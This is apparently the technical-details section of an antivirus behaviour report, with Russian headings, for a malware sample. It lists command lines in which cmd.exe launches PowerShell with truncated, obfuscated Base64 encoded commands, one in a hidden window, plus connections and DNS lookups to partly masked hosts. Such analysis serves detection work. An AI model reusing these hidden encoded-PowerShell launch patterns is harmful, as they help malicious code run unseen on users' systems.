Техническая информация
- '<SYSTEM32>\cmd.exe' & /C pOWErSHELL -EnCODeDCOMMaNd ZgB1AG4AYwB0AGkAbwBuACAAeQBtAEcAVwBUAFYARgBPAG0AVwB5AFMASgBPAEYAdwBZAFoAeQBUAEIASgBZAEMAZABnACAAKAAgACQAQwBhAGUAVABBAFQATABKAFAASQBwAHYAagBDAEkAeABHACAALAAgACQAT...
- 'u.##knik.io':443
- 'x1.#.lencr.org':80
- http://x1.#.lencr.org/
- 'u.##knik.io':443
- DNS ASK u.##knik.io
- DNS ASK x1.#.lencr.org
- '<SYSTEM32>\cmd.exe' & /C pOWErSHELL -EnCODeDCOMMaNd ZgB1AG4AYwB0AGkAbwBuACAAeQBtAEcAVwBUAFYARgBPAG0AVwB5AFMASgBPAEYAdwBZAFoAeQBUAEIASgBZAEMAZABnACAAKAAgACQAQwBhAGUAVABBAFQATABKAFAASQBwAHYAagBDAEkAeABHACAALAAgACQAT...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EnCODeDCOMMaNd ZgB1AG4AYwB0AGkAbwBuACAAeQBtAEcAVwBUAFYARgBPAG0AVwB5AFMASgBPAEYAdwBZAFoAeQBUAEIASgBZAEMAZABnACAAKAAgACQAQwBhAGUAVABBAFQATABKAFAASQBwAHYAagBDAEkAeABHACAALAAgACQATgBlAGQATwBlAHEAb...